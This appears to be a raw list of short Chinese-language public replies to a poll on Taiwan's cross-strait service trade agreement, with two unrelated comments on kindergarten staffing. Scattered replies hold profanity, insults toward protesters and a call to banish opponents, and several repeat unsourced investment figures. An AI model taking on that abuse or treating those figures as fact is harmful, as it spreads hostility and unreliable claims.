<br><br>我不完全知道更不了解,但我相信
<br><br>我不希望我們的經濟給別人管,我希望大家來重視我們的台灣人民心生,我不希望經濟被中國人民共和國控制,所以才說不可以
<br><br>我不怕丫六!我對正港勇敢的台灣人更有信心~反服貿!再怕什麼?
<br><br>我不信
<br><br>我不要鎖國,在經濟生活尊嚴視野我要下一代過的更好更有價值,不要下一代毀在毛都沒長齊什麼都不懂的綠色小毛手上!
<br><br>我不挺服貿!
<br><br>我不想永遠封閉在台灣而已,本來就是適者生存,不適者淘汰。
<br><br>我不想被他們的訴求而犧牲了我的權益、我的民主、我的社會秩序!!
<br><br>我不想變大陸人!
<br><br>我不贊成服貿通過因為我們從事旅遊業(司機導遊)根本賺不到錢(開放大陸來台觀光至今)只有圖利某些財團,基層商家及服務業根本沒賺錢又工時延長也沒多給小費,尤其目前觀光景點都是陸客造成國旅團、歐美、日本團品質變差,影響甚大,所以我們堅決反對服貿通過。
<br><br>我不贊成服貿
<br><br>我反服貿~因為我要生存
<br><br>我反服貿
<br><br>我支持服貿
<br><br>我支持修訂,所以是退回修改後重啟才對,用過或是死 有點太籠統
<br><br>我又沒參加
<br><br>我已投3次了
<br><br>我只是一位高中生
<br><br>我只要安定立命的臺灣
<br><br>我只想問一下
<br><br>我在家沒工作的姑婆與百貨公司小姐是挺服貿...因為政府的所有一切都接受,都不思考...
<br><br>我好帥
<br><br>我同意
<br><br>我希望過服貿,活躍台灣經濟文化。
<br><br>我告訴妳什麼叫厲害!中國大陸叫作厲害!
<br><br>我沒差
<br><br>我的職業是牙體技術員、我會覺服貿要過,因為台灣的技術人員跟其他國家技術不會差太多,卻一直不敢西進、反而是其他國家一直加入、歷史的角度來看清朝也是因為封閉制度導致許多問題。台灣現在的心情就跟清朝差不多、台灣要擔心的不是大陸搶市、而是台灣人自己把有生產毛利的(製作工作過程)往大陸送。大陸的市場如此之大,台灣的市場這麼小。飽和度又怎麼高、大陸人過來如何賺錢還是個問題。
<br><br>我知道大家都很辛苦,也都愛中華民國,但是我不想在封閉的國家討生活,我相信大家要的是「國際化的生活品質,唯有如此我們的下一代,才能走出台灣,走入世界」
<br><br>我很懷疑反對的人到底對服貿瞭解多少?
<br><br>我非常肯定小孬孬=總統
<br><br>我為服貿加油打氣
<br><br>我相信財經專家彭淮南
<br><br>我是中小企業主
<br><br>我是台灣人!我不要做中國人!服貿是服務大財團。中小企業不利。
<br><br>我是笨人,我要基本工作例如清掃在我?地工作,您們高人一等的自己漂洋去別地發展,何必把別地的人帶過來,和我搶飯碗。
<br><br>我是黎,r我們要加油,A錢的第二代也穫黨提名.奸巧的第二代也樣,黨提名,A錢的還沒判決確定,黨也禮讓,我們挑每一選區,選出自己的人。
<br><br>我們不知道幾百年、幾千年、幾萬年後,林先生會不會像八田與一被景仰、被緬懷,還是被怨懟、被謾罵。值得大家深思。
<br><br>我們不能讓我國的經濟邊緣化!和各國交易是必須的,不能只因為是「中國大陸」而有所排斥!
<br><br>我們不須要經濟
<br><br>我們永遠會輸 我們要輸韓國?
<br><br>我們在怕什麼?無論大小服務業 我們台灣服務業競爭力都佷強!無論技術方面 服務態度方面以及誠實不做好黑心事 所以
<br><br>我們明明有WTO,怕什麼,服貿沒寫WTO有服貿就必須尊行
<br><br>我們很謝謝這管道讓我們表達,快悶昏了!加油
<br><br>我們要有自信我們必須進步、創新各種產業都必須,因為台灣沒有資源只有勤奮的台灣人民,只有打開對大陸的協議以台灣人的智慧跟勤奮一定可以開創台灣人民更展新的時代!
<br><br>我們要做的,是提升自己台灣品牌、及台灣人的品質及挑戰性才對!
<br><br>我們要堅持對的價值,而不是盲從。
<br><br>我們要跟朋友作生意,不要跟想併?我們的敵人作生意
<br><br>我們要與世界接軌
<br><br>我們都在同一塊土地上
<br><br>我們需要服貿這東西
<br><br>我們需要監督政府的「 在野黨 」,
<br><br>我們應該把眼光放遠,台灣不能把自己困在小小的圈子更應該相信自己的能力及產業
<br><br>我們還要領22K嗎?中國的市場世界各國都要,我們沒理由放棄,已經輸韓國一大截了,難道還要因意識形態繼續瑣國嗎?
<br><br>我要的是~民主國家
<br><br>我要服貿過,大家才有前
<br><br>我痛恨這些毛都還沒長齊自已?是的死小孩
<br><br>我幹你娘
<br><br>我想大部參加反服貿的人 是反太快速傾中 是反22K 反薪支低 某種程度上代表著草莓族長期鬱卒的一個暴發。並不是真的反服貿。
<br><br>我想保護腳下這塊土地
<br><br>我想留我兒子女兒在台灣工作養家活口,不必養老的起碼養的起自己的小孩。不要遠渡重洋,骨肉分離。留在台灣爭取好一點的薪資
<br><br>我愛台灣
<br><br>我愛我的國家更忠誠台灣,服貿問題不應泛政治化,理應回歸於經濟發展,就新加坡為例,政府應思考未來台灣發展,不應由那些沒有成功者,且理論派,未來國家發展理應傾聽另一方有為青年的聲音。
<br><br>我寧願相信政府也不要相信那幾個凡是都反對的人
<br><br>我對這種情況也不是說很精通或怎麼樣
<br><br>我認為不能以二分法欸。
<br><br>我認為此次的學運是暗地裏結合政治以假反服貿做訴求騙取絕大多數不知服貿是何物的的青年學子上街頭訴求一變再變連他主張台毒都上了檯面從後續蔡丁貴的作為就看得一清二楚所以我認為假學運的這兩個虛偽頭子充其量只是藏在檯面下的那些政治人物的政治打手而以應該要出面跟大多數學生跟社會道歉而不是躲起來消失無蹤社會應該對他們兩個大加撻伐才對
<br><br>我認為服貿對台灣的經濟是有幫助的。
<br><br>我認為服貿對台灣是好的、只是它程序和堅都要做好、不要只圖利財團
<br><br>我認為幾萬個人不能代表兩千參佰萬人,都是有些盲從的人跟著起哄,盼望政府處理非法遊行時更強硬些,越民主他們(群眾)越得寸進尺。
<br><br>我認為 文明人無法跟也野蠻人講道理,更何況簽頂協定,文明人在蠻夷之地作生意,去統計一下現在大陸上有多少台灣國籍的流浪漢,這就是下場。我與大陸跟本是不對等的,有什麼好講的,大家各憑本是。
<br><br>我檢舉過臺北地檢暑集體包庇權貴,證據確鑿,蘋果日報也不敢報導。
<br><br>我覺得撇開政治因素,如過在不過,台灣真的會落後成菲律賓一樣!
<br><br>抗議民眾不能代表全國人民,有不同想法訴求,可透過集會正常程序申請,再由選舉時,全民投票決定,不是現在這種'打著為全民之未來,就想佔哪就佔哪',這才是最可怕的思維,連鎖效應?
<br><br>抗議者 我支持你表達意見 但請在不干涉他人自由為前提 不要說你代表全體國民發生 我沒有給你這樣的權利
<br><br>把反對服貿的人趕到綠島,給他們獨立,不要破壞台灣的未來。
<br><br>把核四廠蓋在馬總統他家核廢料鋪成床給馬總統當床睡問馬總統看他同意嗎?
<br><br>投票人數也未公開
<br><br>投票很有意義
<br><br>投票真有用馬英九早就回應林飛帆了,你在開玩笑嗎?
<br><br>投票
<br><br>投票?果
<br><br>更不用說超前了。
<br><br>更不要刁民!
<br><br>更不要被藍綠影響思考
<br><br>作了就有機會
<br><br>你他媽的,你算老幾,為什麼不經過別人同意就發給我,幹嘛、強奸我的視覺嗎?
<br><br>你如何計算
<br><br>你投票議題那麼不明確
<br><br>你是誰?
<br><br>你是誰
<br><br>你們只有這兩種選擇嗎?有夠狹隘!不去深入了解只知道過跟不過!不知道服貿還有修改討論的選擇嗎?衝著你這個無聊又無腦的投票我就投死給你看!!!
<br><br>你們有沒有體諒一下人家警察
<br><br>你們兩個神的責任咧?
<br><br>你們抽樣標準...年紀標準...職業分類
<br><br>你們的結果是騙人的
<br><br>你們卻拖了那麼久
<br><br>你們是樂在其中是吧
<br><br>你們是誰
<br><br>你們這些唯恐天下不亂的.....
<br><br>你們就是對方是大陸人才反對'那是必須過的'要不然台灣跟本就自早死路'等訂單外移'在來後悔
<br><br>你哪位
<br><br>你哪來取得我的電話資訊?
<br><br>你要赴死還是等死
<br><br>你能作主嗎
<br><br>你這民調不客觀,應該有討論、修正服貿的空間
<br><br>你媽知道你在這裡扭曲民意嗎?
<br><br>你會把你存放的重要資料主機給你的敵對企業,或者敵對國維護嗎!太誇張了!
<br><br>你會發現這些反對團體都一樣,
<br><br>你會擔心這種問題就說明你認同大陸的能力了嘛
<br><br>告戒次世代政客陳為廷、林飛帆,不要只會為了反對而反對,請提出可行的對策與辦法,不要只會一味要求國家但你們卻完全想不出對策,這樣只顯示出彳
<br><br>吵死
<br><br>別在把台灣人民推下海了......!!!
<br><br>別忘記大陸怎麼失去的
<br><br>別為少數人的利益,犧牲大眾
<br><br>別浪費人民的納稅?,示威遊行?看不起這種人,
<br><br>別做島國小民。勇敢挑戰世界。
<br><br>別被那群學匪唬爛了
<br><br>別搞跨小小臺灣。
<br><br>別鬧了
<br><br>別讓少數人民在未經授權下代表多數人民任意作決定!
<br><br>利大於幣
<br><br>利大於弊~
<br><br>利大於弊
<br><br>利多於弊、能提升經濟效益,是好事舉雙手贊成
<br><br>利與弊推動者出來說明白
<br><br>否則讓少數人的決定,毀了多數人的幸福,我們卻不自知。
<br><br>走出去才有未來~
<br><br>走出去才有活路,自閉自封,人家零?稅在發展,我們就等死囉!反服貿反核四,都是同一班人,不為台灣不為什麼,只為搞垮經濟搞掉現在的政府,為了執政,什麼都反對、都抗議。悲哀!
<br><br>走出台灣走向世界
<br><br>走出台灣
<br><br>身為老百性的我們
<br><br>那些政客怎麼不知服貿要過、只是選舉到了、借那些學運的屍體出來鬧、哪知道鬧出了名堂、造就了神、那些不要臉的老政客反而成了看門狗
<br><br>那兩位的確是神,不過是神經的神!
<br><br>那是將來的機會。我相信政府不會那麼笨!基本的保護原則應該俱備。有服貿才有機會,沒有!連門都進不去。怎麼展望未來呢?學運並不能代表全國未發聲的人!
<br><br>那2位自以為是神的人,是小英俱樂部瘋神無雙部門
<br><br>防人之心不可無,但也不要老想別人會來害你!現在是地球村,本來就是要??小心,時時修正腳步,才能走得出去,走得遠,才能走得穩!
<br><br>並非大陸就是唯一的?濟選擇
<br><br>事情總有人同意有人反對,但現在反對的人真的是反對服貿嗎?還是反對政府的不民主?我們的總統?你是人民選舉投票選出來的,而你現在卻連當初支持你的人都不敢面對?我個人認為你可以別幹了!
<br><br>兒女的一代?電價一直漲,生活過不去不?,石化發電污
<br><br>兩岸統一,把負債丟給對岸,
<br><br>兩岸貿易談判就是有取有捨,在ECFA架構下必須通過。
<br><br>兩個自居為神的學生
<br><br>其實幼教師與教保員隱藏在幼兒園裡都稱為老師,對一般民眾而言也很難分別出差異,幼教師是需修教育學程並且經過實習與通過教師檢定取得教師證,在培育過程著重教育;教保員則是幼教幼保相關科系畢業即可為教保員,在培育過程著重保育。但若論起哪個群體具幼教專業,其實得先定義幼教專業,對於學前階段該重視的部分因為長期以來積非成是與既有迷思,所以談起所謂「幼教專業」恐怕又是一陣唇槍舌戰,何況師父領進門修行在個人,某種體系能絕對優於另一體系想必是斷不可能,尸位素餐的幼教師時有所聞,克盡職守的教保員亦不在少數,因此這項修正案對於許多教保員而言可能真是種肯定,也就把連署案視為幼教師對教保員的打壓與否定。
<br><br>其實任何政策必定有利弊,若一昧只有對自己好的協定,那就不是協定。相信台灣會更好。
<br><br>其實有很多人不是反服貿為何少數人因為大聲便可毫無公正公平的決定屬於全國人民的事情
<br><br>制ㄓㄓ制置之ㄘㄘㄘ˙
<br><br>協議可以改、約定可以變
<br><br>呵呵了我就
<br><br>災難
<br><br>每個政策有利有弊,我們已經不能再關著門自己玩自己的這是一個地球村的時代,唯有加強自己的競爭力才能做自己的主人,我們要自己加油。
<br><br>沈默多數,公民素質。
<br><br>沈默的大多數之一
<br><br>沈默是多數
<br><br>決方案的trouble maker。
<br><br>決食如果算,衝突如果算
<br><br>沒什麼有用的消息,只知道我國政府吃大陸的米飯長大,也就是大陸的狗,韓國跟美國談了11年才通過,我們怎麼可能跟中共不到兩年就談和,真的是把國家賣了都不會痛的爛政府
<br><br>沒工作!
<br><br>沒有不景氣、只有不爭氣
<br><br>沒有人希望自己的國家用(死)來形容。
<br><br>沒有生產能力只會在那邊鬼吼鬼叫,為什麼不做一些比較有實際句體有意義事。沒有能力不趕面對大環境。這樣只會鎖國自封。
<br><br>沒有自信的人,才會怕服貿。
<br><br>沒有別的選項了嗎
<br><br>沒有明確的說明,匆促非民主國家作為,不要一句程序正義,依法行政。就把非法夾合法之便
<br><br>沒有服貿,台灣將被邊緣化,進出口不具競爭力,企業不在台灣設廠,就沒有就業職缺,失業率大增,只好出國當台勞,過苦日子。
<br><br>沒有服貿。很快就被南韓打?
<br><br>沒有服貿日子不好過,生在台灣的台灣人倒不如相信政府努力改變台灣經濟,或許有過好日子的機會。台灣加!不要再亂了!
<br><br>沒有服貿沒有生活沒有工作
<br><br>沒有服貿就沒有未來!
<br><br>沒有服貿就沒有未來了一樣的沒有核四也沒有未來在台灣人民會日子好過嗎你們想想!沒水沒電日子會好過嗎如果台灣是這樣的就會很多人會去栘民離開台灣了這是台灣要的嗎。
<br><br>沒有服貿會失信於國際,還有誰?與台灣締結任何?定?
<br><br>沒有勇氣。沒有服貿就可以嗎?
<br><br>沒有意義
<br><br>沒有經過合理的調查結果,少數人佔領政府單位就說代表民意,無法令人信服,國與國簽訂貿易協定,是一個趨勢,閉關自守逢中必反,是一種不理智的做法,將讓台灣陷入無可救?的處境
<br><br>沒有過台灣沒有競爭力!沒有??提升的希望!下一代沒有工作機會~
<br><br>沒有過會死?過了也許有機會
<br><br>沒有學運,只見暴民
<br><br>沒有競爭能力的人才怕過
<br><br>沒有
<br><br>沒的選擇,希望政府能嚴厲把關,服貿要過
<br><br>沒服貿,臺灣死,臺灣還有可以與別人比的
<br><br>沒為什麼
<br><br>沒看過世界的學生怎麼能代表全民
<br><br>沒意見的未必少數,如果政策不是滿意,就出來叫一叫,就能推翻政策,代表多數,這算哪門子民主。若如此,往後遇到不如己意,比照辦理,那台灣還想有好日子!
<br><br>沒實力沒建設性的想法 當然一致抵制服貿撤銷 被政客政黨操控的背後 蒙蔽多少國際觀 和民主該有的見解
<br><br>沒實力的才反
<br><br>沒道理不過
<br><br>沒過台灣才是死
<br><br>沒過台灣經濟就完蛋!
<br><br>沒電的日子怎麼過?!
<br><br>沒價值
<br><br>沒錯、政府的確很爛啦,不管藍綠
<br><br>沒
<br><br>肓目的反對是無法改善台灣目前的困境,只有雙万貿易平等,台灣才有機會殺出重圍,
<br><br>怕死就別出社會
<br><br>房仲已經確定大陸人來台買房,台灣人永遠買不起房,房價越來越高
<br><br>所以一人一票是民主政治必需承受的原罪
<br><br>所以你們到底上哪要到電話號碼的?請不要再傳廣告來謝謝
<br><br>所有官員都應該各司其職、馬總統的個人意見謹供?考、我們身為政府的頭家~~ 我們祇想看到大家都在作正當的事情???
<br><br>所謂的民主自由只是一種藉口
<br><br>所謂的開放 並不等於入侵 服貿是?了讓貿易更加順暢 減少許多貿易上的壁壘 對於進出口是有所幫助的 台灣需要國際化 仰賴國內只會讓經濟停滯不前
<br><br>拒絕F1賽車場,F1去了新加坡,月營收30億。
<br><br>拒絕古根漢,古根漢去了西班牙,年營收300億。
<br><br>拒絕古根漢,古根漢去了西班牙,
<br><br>拒絕古根漢博物館,古根漢去了西班牙,年營收300億。
<br><br>拒絕杜邦,杜邦去了山東,投資250億。
<br><br>拒絕杜邦,杜邦去了山東,
<br><br>拒絕杜邦設廠,杜邦去了山東,投資250億。
<br><br>拒絕服貿,韓國要!
<br><br>拒絕拜耳,拜耳去了德州,投資1260億。
<br><br>拒絕拜耳,拜耳去了德州,
<br><br>拒絕拜耳進駐,拜耳去了德州,投資1260億。
<br><br>拒絕迪士尼,迪士尼去了香港,年營收1400億。
<br><br>拒絕迪士尼,迪士尼去了香港,
<br><br>拒絕迪士尼來台,迪士尼去了香港,年營收1400億。
<br><br>拒絕龍燈,中國要!
<br><br>拒絕F1賽車場,F1去了新加坡,月營收30億。
<br><br>拒絕F1賽車場,F1去了新加坡,
<br><br>放下成見放下恩怨
<br><br>易協定對於國家經濟,貿易競爭力,就業率提昇等等正面價值,他們還沒機會懂。
<br><br>和平和?共?才能久安!自然天撰是天定!努力自由不是?惰自私的敵人!
<br><br>和平 理性 尊重 才是民主的唯一真諦
<br><br>命題太不清楚,應該是用贊成或不贊成才是,這投票有鬼
<br><br>垃圾訊息請不要亂發,正義的事用不正義方法反而造成反效果...
<br><br>垃圾廣告商測試訊息
<br><br>垃圾調查,毫無根據,造謠生事,擾亂民心
<br><br>定遊戲規則!規則沒定就想打球?
<br><br>官逼民反
<br><br>宜蘭縣
<br><br>尚未脫離奶嘴的:嘸成仔:不知天高地厚
<br><br>爭取自由 做自己的主人!
<br><br>狀況外的年輕人不要不再被擺佈了
<br><br>的敵營飽受社會輿論的撻伐。
<br><br>的
<br><br>直接點說,這項修正案的推行不過是掛羊頭賣狗肉,暗地裡讓低薪聘僱幼教從業人員合理化,因為長期以來許多幼教業者即以低薪聘僱教保員甚至非具幼教相關背景人員為幼稚園教師,造成合格幼教師不願屈就低薪便轉換領域或年年參加甄試想擠進公幼窄門,幼托整合後,幼照法已讓業者與縣市政府能合法以較低的薪資待遇聘用教保員擔任為中小班與大班其中一位「老師」,也就是一個園所若有大中小三個班級,其實只要一位合格的幼教師即可,正因這樣的政策,讓業者與縣市政府在幼兒園的人事成本得以大大降低,而這項修正案若通過,則更能堂而皇之的以低薪聘用幼教從業人員,若政府與業者當真重視幼教專業與孩子的學前教育,怎能將節省人事成本視為政策擬定的影響因素呢?當然此為個人解讀,不過推想這樣的政策方向使誰受益,也就不難發現司馬昭之心,不能將教師素質提升,而一味的放寬限制,後續效應恐怕不是短視近利之人能想像的,借用施文彬先生名言:?只出得起香蕉,當然只請得到猴子!?。
<br><br>知道對企業有競爭力!民進黨很多是不理智的,為反對而反對!如果有一天他們執政!?續鎖國政策的話!真不知是褔是禍!台灣人民現在真可悲!
<br><br>近水樓台先得月為何不得難有競爭力
<br><br>近水樓台要先得習習
<br><br>阿
<br><br>服冒不是政府說過就過,而是人民審查通過才能過!
<br><br>服冒不能過
<br><br>服冒必須過 台灣別再鎖國了
<br><br>服冒死死死
<br><br>服冒協議附件內容都沒看到!
<br><br>服冒絕對要死,這不是未來努不努力生活可以自救的問題,你現在瘋狂的埋頭自救時,等抬起頭,槍已經抵在你的腦袋了
<br><br>服冒過台灣就完了
<br><br>服冒過 台灣死
<br><br>服務貿易法是啥沒人知。公共部門亦未宣傳。是跟整個中國?還是只有福建省?怪怪。一般民眾,學生皆可表?其立場,不能因反對即冠污名,學生非為了自己利益,台灣執政政府已經未有遠大藍圖社會政經如何進??執政政府需要提出20~50之長遠計畫。非一直提出與目前敵?之國家服務貿易合約,短暫快樂,將來換成痛苦
<br><br>服務業本質就是競爭,想反服貿來避開中國大陸的威脅,那是鴕鳥心態,只有正面面對,才是正道。
<br><br>服貿,是種貿易協定。的確是要有各國間的貿易協定存在,但此次條款太過極端。要過的不是這一個,而是經由審查後的下一個
<br><br>服貿,核電都要台灣才有未來!
<br><br>服貿「死」
<br><br>服貿「通過」是台灣人民智慧的選擇
<br><br>服貿「過」
<br><br>服貿不是不好,是馬政府簽的不好。見不得人。
<br><br>服貿不是件壞事但現在政府沒有做好補救政策
<br><br>服貿不是毒品 搖搖欲墜的政府才是毒害人民的腫瘤
<br><br>服貿不是問題,台灣沒有未來藍圖,才是重點
<br><br>服貿不能再拖延,趕快通過吧
<br><br>服貿不能過
<br><br>服貿不能過 台灣才有希望!!!
<br><br>服貿不能?,?了中下層會很慘。
<br><br>服貿不僅僅是牽涉到服務業以及貿易等等議題,而是直接關係到臺灣與中國是否要成為一經濟共同體,係國安問題。我們絕不可以輕視!
<br><br>服貿不過,台灣將來沒有競爭力
<br><br>服貿不過、核四停建~加速台灣的毀滅....
<br><br>服貿不過!台灣必亡!
<br><br>服貿不過大家等死
<br><br>服貿不過必然會死!
<br><br>服貿不過只有等死。
<br><br>服貿不過台灣必死!
<br><br>服貿不過台灣只有向下沉淪
<br><br>服貿不過台灣死
<br><br>服貿不過台灣完蛋!!
<br><br>服貿不過台灣苦曰子來了!被少數為了自己政治騙子背後煽動,害慘台灣人了,這些人禽獸不如!害人害己!
<br><br>服貿不過台灣將原地踏步,競爭力將遠遠落後南韓,鎖國最後就走向滅亡,以後韓國人會請台灣人當台傭,因為這樣他們會很有面子,曾經的對手將成為明日的傭人,也讓他們出了一口氣。
<br><br>服貿不過台灣等同自外於各國立即孤立,本來服貿就是兩岸ECFA簽訂後衍生的系列子子條例中的一環,其後還有貨貿、經貿等等,其目的也就是彌補台灣已然在東盟10+3中被東盟排除在外的困境,依然等同東盟待遇不被邊緣化,維持競爭力,當然必需結合後續需簽訂的貨貿、經貿,再加RCEP、TPP的簽訂,才大功告成。中國大陸是不容否認且事實存在的大經濟體,各國競相與之發生關係唯恐不及,沒有哪一個國家會愚蠢到要與之隔絕拒往,何況;任何合作或合約都是權力義務是對等的,一定要取得互相滿足及平衡,否則就是違反公平正義,就是不平等條約,在法律上而言也屬違反法理的行為,何況;雙方已完成協商,對協議內容對方已先行同意,只等我方的法定程序完成即可簽署生效。再觀其內容為方式對等其實具體執行是對我們實質有利的,多少年來台灣服貿業早即登陸大陸服貿市場而且紅紅火火,勢不可擋,也都形成創意衍成風潮,這是台灣絕對主導的軟實力,早在彼岸生根發芽,有何可憂,加上來的是投資者,又非夥計,限制又苛刻,又何懼之有?徒顯台灣人小國寡民自信缺缺而已,咸認係「假抗爭真政治操作」,「為反對而反對的」的反對黨的政治操作,我認為是不爭的事實。一種愚民的學運由帶頭者均為民進黨培育的「職業學生」如林、陳之流,利用不明情況的熱情學生及群體的盲目追隨形成的群眾意志,其來源即帶頭者的個人意志無限上綱被認同下的綁架群眾意志,發生的所謂「學運」,所反者,稍具判斷力的人均可清晰的明辯是非,既為學生或教育界人仕,更應:博學、審問、慎思、明辯,道理就很清處了。
<br><br>服貿不過台灣等同自外於各國立即孤立,本來服貿就是兩岸ECFA簽訂後衍生的系列子子條例中的一環,其後還有貨貿、經貿等等,其目的也就是彌補台灣已然在東盟10+3中被東盟排除在外的困境,依然等同東盟待遇不被邊緣化,維持競爭力,當然必需結合後續需簽訂的貨貿、經貿,再加RCEP、TPP的簽訂,才大功告成。中國大陸是不容否認且事實存在的大經濟體,各國競相與之發生關係唯恐不及,沒有哪一個國家會愚蠢到要與之隔絕拒往,何況;任何合作或合約都是權力義務是對等的,一定要取得互相滿足及平衡,否則就是違反公平正義,就是不平等條約,在法律上而言也屬違反法理的行為,何況;雙方已完成協商,對協議內容對方已先行同意,只等我方的法定程序完成即可簽署生效。再觀其內容為方式對等其實具體執行是對我們實質有利的,多少年來台灣服貿業早即登陸大陸服貿市場而且紅紅火火,勢不可擋,也都形成創意衍成風潮,這是台灣絕對主導的軟實力,早在彼岸生根發芽,有何可憂,加上來的是投資者,又非夥計,限制又苛刻,又何懼之有?徒顯台灣人小國寡民自信缺缺而已,咸認係「假抗爭真政治操作」,「為反對而反對的」的反對黨的政治操作,我認為是不爭的事實。一種愚民的學運由帶頭者均為民進黨培育的「職業學生」如林、陳之流,利用不明情況的熱情學生及群體的盲目追隨形成的群眾意志,其來源即帶頭者的個人意志無限上綱被認同下的綁架群眾意志,發生的所謂「學運」,所反者,稍具判斷力的人均可清晰的明辯是非,既為學生或教育界人仕,更應:博學、審問、慎思、明辯,道理就很清楚了,反啥?白痴或低能才反,這叫自廢武功。
<br><br>服貿不過台灣經濟死,我不想夜郎自大
<br><br>服貿不過台灣經濟會跨!支持服貿
<br><br>服貿不過台?必死
<br><br>服貿不過馬上死,服貿一過慢慢死。
<br><br>服貿不過會死。
<br><br>服貿不管過還是死,問題的癥結點不在於服貿,而是我們的**政府**
<br><br>服貿不簽後續的任何和約均無法?續臺灣將成為孤島
<br><br>服貿內容是什??我祇知道〔伏冒感冒藥冶感冒〕。
<br><br>服貿及所有貿易協定與免簽証一樣都是對等的,只有好處越早簽訂?國家越有幫助。
<br><br>服貿及核四必須過台灣才有存活空間,不至於被邊緣化。核四不過,將來電費?漲、及火力發電造成之嚴重?染是否由”太陽花”那些民 進黨的職業學生負責??
<br><br>服貿一定要過,全民要有國際關,要全力發展經濟
<br><br>服貿一定要過,群眾是盲從的,但政府的政策有必要時,還是要跟人民說明清礎,不要被少數政客?架,馬政府要硬起來,如果連這樣的事情,都處理不好,國家交給你們,實在不放心,乾脆下台鞠躬好了,沒有能力,就不要?著權位不放。
<br><br>服貿一定要過!不過台灣只有死!
<br><br>服貿一定要過台灣才有希望,年輕人才有工作,沒過台灣就自生自滅了,請大家要有智慧,不要別那些政客騙了。
<br><br>服貿一定得過,但是民主的審查程序一定得有。
<br><br>服貿一過,貧富差距將加速拉大,失業率提高。台灣人民政府應該想想如何自救,不需一昧地屈膝於中國大陸。
<br><br>服貿一過有錢人更有錢,窮苦人將無法翻身?
<br><br>服貿人民自投
<br><br>服貿必須過,內容必須修
<br><br>服貿必過才有前途
<br><br>服貿本身非非黑即白的事情,簡化成不清不楚的投票選項,感覺不太恰當。
<br><br>服貿本來就有好有壞
<br><br>服貿本質是好的、可行性也高。
<br><br>服貿本質就不是國與國之間的關係在協商 而且還不僅僅這樣
<br><br>服貿先審查立法制?所以死
<br><br>服貿可以給年輕人更多機會
<br><br>服貿可以過.但是不是每條都能過.請逐條省察.修正.沒有任何一個人可以決定任何一個人的未來.即便是總統.不是900億的預備補助金就能夠彌補可能會造成的傷害.這裡是台灣.有民主法治國家之稱.並非可以任意踐踏人民的未來!
<br><br>服貿可增強我國實力
<br><br>服貿有用嗎?馬英九出來面對
<br><br>服貿有利有弊 不要為了反而反 好嗎 當個有水準理性思考的文明人
<br><br>服貿死,台灣經濟死得更慘!
<br><br>服貿死!
<br><br>服貿死才是正確
<br><br>服貿死 枯萎緩現
<br><br>服貿再不過、別怪別人不給你路走
<br><br>服貿再怎麼擋,也擋不住如大浪般人海的中國人了!
<br><br>服貿如果過台灣人將會永遠買不起房子
<br><br>服貿並非非死不可,有誤導之嫌。
<br><br>服貿沒過,台灣下一代,就可憐了,要學習慈囍太后封閉嗎?封閉結果是:不堪一擊
<br><br>服貿沒過才會完蛋
<br><br>服貿沒過台灣在世界各角落都難生存
<br><br>服貿的利益不知道未來怎麼樣。但是一旦過了。未來臺灣被控制的事實就會不去了。臺灣以我們的文化而嬌傲。
<br><br>服貿怎能過!!
<br><br>服貿活,後代死。
<br><br>服貿是可以幫助經濟
<br><br>服貿是台灣國際化的接軌,若是不過台灣被邊緣化,企業沒有競爭力,年輕人找不到工作,失業率增加,台灣就束手無策。
<br><br>服貿是台灣經濟走向開放、國際化,必要的選擇。只要政府做好必要的補償與配套,全民應予支持。
<br><br>服貿是有利的,絕大部分企業主都知道,不應投票決定
<br><br>服貿是要過才能提高國際競爭力但是前提是要逐條審核考量
<br><br>服貿是開放大陸13億的窮人進來,再怎麼笨的政府,做這樣的事,國家一定完蛋。
<br><br>服貿是經濟發展的開始
<br><br>服貿是慢性毒藥,過將來死,但還有時間找解藥。沒過,現在就準備死,連吃解藥的機會也沒有。
<br><br>服貿是趨勢~避免不了。
<br><br>服貿是競爭,是開放,再提升台灣,不能置於全球競賽之外
<br><br>服貿是啥小?
<br><br>服貿是1%的有錢人獲利,99%的中下階層受害的協議,堅決反對!
<br><br>服貿是ECFA下面的一項,如果不要服貿;那一開始就不要簽ECFA
<br><br>服貿是W?O的延伸,服貿只是針對中國而已,不走下去是自掘墳墓。
<br><br>服貿要透明不能圖利財團老百姓也要有利
<br><br>服貿要過,否則台灣穩死
<br><br>服貿要過、讓大家賺錢,交流文化,讓台灣全球化。
<br><br>服貿要過不能死
<br><br>服貿要過可以,但要現剔除對我國不平等之條例,而不是包裹式的照單全收,挖幹拎宗痛咧!
<br><br>服貿要過但要監督,現在已經是地球村了,政府要做的除了把大門打開,也要想辦法提昇國人的教育及收入、產業升級,媒體也應該更加播放外國新聞??
<br><br>服貿要過核四更要過!!
<br><br>服貿要過
<br><br>服貿致少一定要立法,否則用行政序會讓政府高層無所紀會的為了自己的各方面的思為、利益、壓力、利誘、身價、?史定位、權力、地位、法則條例的制定有無周全??等等,胡亂搞。立了法最少有抬面化,有法律法則可規範規尋,行政法規,則可由政府機關自行解釋規範,有權有勢的大老板有辦法透過關係處理,但也不一定行的通,更何況其他人呢?。
<br><br>服貿若死~台灣真的等死!
<br><br>服貿若死,下一代草莓也將等死
<br><br>服貿若是只為財團造路,不顧中下層百姓生活,不要也罷
<br><br>服貿若是沒有深思熟慮、隨便通過,定會衝擊台灣人民的生計!
<br><br>服貿若通過,台灣將喪失一切主體價值
<br><br>服貿核四是假議題 誤國政客該死
<br><br>服貿務必通過,否則如一池死水。
<br><br>服貿條例要公審,不是不能過…但是不要?箱作業
<br><br>服貿通過台灣才有前途光明
<br><br>服貿通過會死,服貿不通過,台灣會變成孤島,甚至成為地獄島。孰重孰輕?不是上街抗議就算有結果。
<br><br>服貿就是服貿,要好好討論。不要被這些政治的學生搞錯目標了,他們都是為了自己的利益,不要被騙了!
<br><br>服貿就跟人囗及土地的不平等而非服貿不好因為服貿是對台灣不平等條約所以是死台灣是大陸祖國大陸不因該欺侮台灣
<br><br>服貿等同木馬
<br><br>服貿照原來不透明的條款通過,絕大部分台灣人民將受害大於受益。
<br><br>服貿會影響中下階產業 加上政府沒有實際解決方法
<br><br>服貿會讓國家更有競爭力!
<br><br>服貿對小老百姓而言會很吃虧,只是增加貧富差距,也讓M字型社會更明顯。並沒有讓每個人有享受到平等權這項權力。
<br><br>服貿對台灣的經濟還是有利益的啊
<br><br>服貿對弱勢產業要如何降低衝擊政府要把做法說明清楚而不是只說補助900多萬
<br><br>服貿過~死
<br><br>服貿過,人民禍,服貿不過,人民不錯!
<br><br>服貿過,大家就會死。
<br><br>服貿過,對台灣必定有好處!
<br><br>服貿過!核四停!
